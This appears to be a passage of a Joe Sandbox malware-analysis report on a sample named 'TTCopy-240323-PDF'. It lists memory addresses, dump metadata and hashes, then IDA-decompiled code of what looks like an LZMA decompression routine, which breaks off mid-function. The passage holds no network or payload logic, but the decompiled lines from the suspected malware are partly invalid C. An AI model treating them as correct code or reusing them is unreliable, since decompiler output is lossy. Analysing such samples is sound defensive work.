                                                                                            0x00406f0f
                                                                                            0x00406f29
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f75
                                                                                            0x00406f75
                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00000000
                                                                                            0x00407482
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x004075e5
                                                                                            0x004075eb
                                                                                            0x004075ed
                                                                                            0x004075f4
                                                                                            0x004075f6
                                                                                            0x004075fd
                                                                                            0x00407601
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x00407447
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407399

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
